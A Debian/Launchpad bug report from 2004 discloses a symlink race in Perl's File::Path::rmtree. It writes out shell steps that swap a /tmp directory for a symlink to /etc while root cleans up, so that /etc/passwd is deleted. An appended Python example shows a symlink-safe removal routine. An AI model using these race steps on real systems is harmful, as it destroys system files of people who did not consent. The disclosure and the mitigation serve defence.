perl-modules: File::Path::rmtree removes arbitrary
Bug #11409 reported by Debian Bug Importer
This bug report is a duplicate of:
Bug #11407: perl-modules: File::Path::rmtree makes setuid.
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| perl (Debian) | Fix Released | Unknown | | |
| perl (Ubuntu) | Invalid | High | Unassigned | |
Bug Description
Automatically imported from Debian bug report #286922 http://
- Changed in perl: status: Unknown → Fix Released
- Changed in perl: status: Fix Released → New
- Changed in perl: status: New → Fix Released
Message-Id: <email address hidden>
Date: Thu, 23 Dec 2004 10:00:00 +1100
From: Paul Szabo <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: perl-modules: File::Path::rmtree removes arbitrary
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Following on from the "File::Path::rmtree makes setuid" issue, I notice
that rmtree may be tricked into removing arbitrary files.
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
```
mkdir /tmp/psz
perl -e 'open F, ">/tmp/psz/$_" foreach (1..1000)'
touch /tmp/psz/passwd
```
While root is busy working on /tmp/psz (and this can be made as slow as
we like), attacker does:
```
mv /tmp/psz /tmp/dummy
ln -s /etc /tmp/psz
```
Root will then remove /etc/passwd.
Maybe it should be documented that rmtree must only be used if you can
be sure to have exclusive access to the tree.
Cheers,
Paul Szabo - <email address hidden> http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
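The weakness in the report is a check-then-use race: rmtree resolves a path string, and between its check and its unlink the directory can be swapped for a symlink. Below is an added illustration of the mitigation, written for this page in Python rather than taken from the Debian report or from File::Path: each directory is opened with O_NOFOLLOW|O_DIRECTORY and every unlink and rmdir is done relative to that open descriptor, so a directory replaced by a symlink is refused instead of entered. The function names and the constructed layout under a temporary directory are assumptions of the example.

```python
import os
import tempfile

def rmtree_nofollow(path):
    # O_NOFOLLOW|O_DIRECTORY makes open(2) fail with ELOOP if the path has
    # been swapped for a symlink, so the link is refused rather than entered.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY)
    try:
        removed = _remove_contents(fd)
    finally:
        os.close(fd)
    os.rmdir(path)  # rmdir(2) never follows a symlink, so a swapped path just fails
    return removed

def _remove_contents(dfd):
    # Every open/unlink/rmdir is relative to the already-open directory fd,
    # so re-pointing the path string between check and use gains nothing.
    removed = 0
    with os.scandir(dfd) as entries:
        for entry in entries:
            if entry.is_dir(follow_symlinks=False):
                sub = os.open(entry.name, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY, dir_fd=dfd)
                try:
                    removed += _remove_contents(sub)
                finally:
                    os.close(sub)
                os.rmdir(entry.name, dir_fd=dfd)
            else:
                os.unlink(entry.name, dir_fd=dfd)  # a symlink is unlinked, never followed
            removed += 1
    return removed

def demo():
    # Constructed layout: psz/ holds a subdir, a file and a symlink into victim/;
    # psz2 is a symlink standing where the directory to be cleaned used to be.
    base = tempfile.mkdtemp()
    victim = os.path.join(base, "victim")
    os.mkdir(victim)
    open(os.path.join(victim, "passwd"), "w").close()
    tree = os.path.join(base, "psz")
    os.makedirs(os.path.join(tree, "sub"))
    open(os.path.join(tree, "sub", "junk"), "w").close()
    os.symlink(victim, os.path.join(tree, "link"))
    removed = rmtree_nofollow(tree)
    os.symlink(victim, os.path.join(base, "psz2"))
    try:
        rmtree_nofollow(os.path.join(base, "psz2"))
        refused = False
    except OSError:
        refused = True
    return {"removed": removed, "refused": refused, "tree_gone": not os.path.lexists(tree),
            "victim_intact": os.path.exists(os.path.join(victim, "passwd"))}
```

Running demo() removes the three entries of psz/ (the symlink is unlinked, not followed), refuses the symlink placed at psz2, and leaves victim/passwd in place.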